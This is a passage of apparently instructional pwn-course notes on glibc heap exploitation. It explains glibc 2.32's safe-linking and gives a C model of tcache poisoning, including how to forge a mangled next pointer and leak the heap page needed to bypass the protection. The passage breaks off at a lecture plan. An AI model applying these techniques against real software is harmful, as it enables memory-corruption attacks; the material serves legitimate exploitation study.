Take a look with me at: https://sourceware.org/git/?p=glibc.git;a=summary
This is the actively maintained glibc git repo, and it receives commits regularly. At the moment major releases happen every 6 months.
These releases add security measures based on feedback, advice, and the pwn community.
Right now 2.34 is the latest stable release and 2.35 is under active development (there was an update 90 minutes ago, in fact).
I have wrestled with how to walk you to the point that you can do a full-green exploit on the latest glibc versions.
The problem is that even my pwn environment is set up for 2.31.
I'd like to show you the interesting tcache/fastbin security measure (safe-linking) they added in 2.32, which I can do with the following:
https://wargames.ret2.systems/level/how2heap_tcache_poisoning_2.34
The interesting line is:
b[0] = (intptr_t)((long)target ^ (long)b >> 12);
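To make that one line concrete, here is an added example (my own model, not code from the page, how2heap or glibc) of the safe-linking scheme glibc 2.32 added to the tcache and fastbin singly linked lists. The XOR arithmetic is exactly glibc's PROTECT_PTR/REVEAL_PTR: a stored next pointer is XORed with its own slot address shifted right by 12, so the how2heap line parses as target ^ (b >> 12) (in C, >> binds tighter than ^). Everything else is constructed for the demo: the two-chunk fake heap, the 16-byte aligned "victim" standing in for the real target, the constructed addresses used to show the alignment abort, and the simplified tcache_put/tcache_get models (real entries also carry a key field and a per-bin count).

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the page, how2heap or glibc: a model of the
 * safe-linking that glibc 2.32 added to the tcache and fastbin lists. The XOR
 * arithmetic matches glibc's PROTECT_PTR/REVEAL_PTR; the bins, chunk layout,
 * "victim" target and sample addresses below are constructed for this demo. */

typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry;

/* PROTECT_PTR(pos, ptr): pos is the address of the slot the pointer lives in,
 * so the mask depends on where the chunk sits, not on what it points to. */
uintptr_t protect_ptr(uintptr_t pos, uintptr_t ptr) { return (pos >> 12) ^ ptr; }
/* REVEAL_PTR is the same XOR (XOR is its own inverse). */
uintptr_t reveal_ptr(uintptr_t pos, uintptr_t mangled) { return (pos >> 12) ^ mangled; }
/* aligned_OK: chunks must be 2*SIZE_SZ (16 bytes on x86-64) aligned. */
static int aligned_ok(uintptr_t p) { return (p & (2 * sizeof(size_t) - 1)) == 0; }

/* The value an attacker must write into chunk->next to point the bin at
 * `target`: the page's line, target ^ (b >> 12), with b the slot address. */
uintptr_t forge_fd(uintptr_t slot_addr, uintptr_t target) {
    return protect_ptr(slot_addr, target);
}

/* Would writing the *unmangled* target into the slot survive? glibc reveals
 * target ^ (slot >> 12), which is unaligned whenever bits 12..15 of the slot
 * address are non-zero, so a pre-2.32 style overwrite usually aborts. */
int naive_fd_survives(uintptr_t slot_addr, uintptr_t target) {
    return aligned_ok(reveal_ptr(slot_addr, target));
}

/* The first chunk freed into an empty bin has next == NULL, so its stored
 * next is just slot_addr >> 12: reading it back leaks the heap page. */
uintptr_t heap_page_from_leak(uintptr_t leaked_next) { return leaked_next << 12; }

/* Model of tcache_put: mangle against the slot's own address. */
void model_tcache_put(tcache_entry **bin, tcache_entry *e) {
    e->next = (tcache_entry *)protect_ptr((uintptr_t)&e->next, (uintptr_t)*bin);
    *bin = e;
}

/* Model of tcache_get (2.32+): the head is checked with aligned_OK before use
 * (real glibc aborts with "malloc(): unaligned tcache chunk detected"), then
 * its next is revealed and becomes the new head. NULL here stands for the abort. */
tcache_entry *model_tcache_get(tcache_entry **bin) {
    tcache_entry *e = *bin;
    if (e == NULL || !aligned_ok((uintptr_t)e)) return NULL;
    *bin = (tcache_entry *)reveal_ptr((uintptr_t)&e->next, (uintptr_t)e->next);
    return e;
}

/* Constructed chunks and a constructed, 16-byte aligned target ("victim"). */
static _Alignas(16) unsigned char fake_heap[2][32];
static _Alignas(16) unsigned char victim[32];

/* Free a lone chunk into an empty bin and check that its stored next leaks
 * the chunk's own heap page. */
int lone_chunk_leak_matches(void) {
    tcache_entry *bin = NULL;
    tcache_entry *a = (tcache_entry *)fake_heap[0];
    model_tcache_put(&bin, a);
    return heap_page_from_leak((uintptr_t)a->next) == ((uintptr_t)a & ~(uintptr_t)0xfff);
}

/* The how2heap tcache_poisoning flow against the model: free a, free b,
 * overwrite b->next with the forged value, malloc twice. Returns 1 if the
 * second malloc handed back `victim`. */
int run_poisoning(void) {
    tcache_entry *bin = NULL;
    tcache_entry *a = (tcache_entry *)fake_heap[0];
    tcache_entry *b = (tcache_entry *)fake_heap[1];
    memset(fake_heap, 0, sizeof fake_heap);
    memset(victim, 0, sizeof victim);

    model_tcache_put(&bin, a);          /* free(a): a->next = (&a->next >> 12) ^ 0 */
    model_tcache_put(&bin, b);          /* free(b): b->next = (&b->next >> 12) ^ a */

    /* UAF write, the page's line: b[0] = target ^ ((long)b >> 12) */
    b->next = (tcache_entry *)forge_fd((uintptr_t)&b->next, (uintptr_t)victim);

    tcache_entry *first = model_tcache_get(&bin);   /* returns b, head becomes victim */
    tcache_entry *second = model_tcache_get(&bin);  /* returns victim */
    return first == b && second == (tcache_entry *)victim;
}

int main(void) {
    printf("lone-chunk next leaks heap page: %s\n", lone_chunk_leak_matches() ? "yes" : "no");
    printf("poisoning via model: %s\n",
           run_poisoning() ? "second malloc returned target" : "failed");
    /* constructed addresses: a slot at 0x...a2a0 has non-zero bits 12..15 */
    printf("unmangled target survives aligned_OK: %d\n",
           naive_fd_survives((uintptr_t)0x55555555a2a0ULL, (uintptr_t)0x7ffff7e1b6a0ULL));
    return 0;
}
```

The two practitioner takeaways the model makes visible: you need the heap address (bits 12 and up) of the slot you are overwriting before you can forge a valid next, and a chunk that was freed into an empty bin gives you exactly that leak for free if you can read it back.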
The issues I've faced in prepping for that one line of code are the following:
I'd like us to do a full-green exploit on the latest glibc in the next week or two.
But for now here is a "target practice" script (just a variation on the heap vuln playground)
I made it the PCP for today to run this target practice against glibc_2.34.
So the issue is that in 2.34 the nature of our targets changes (the __malloc_hook/__free_hook family is gone) and the nature of the protections changes.
I want to show you how to handle both but I can't in one go.
So here's my plan for the rest of the lectures in order to walk towards the goal: Full-green 2.34 exploits.
Let's do: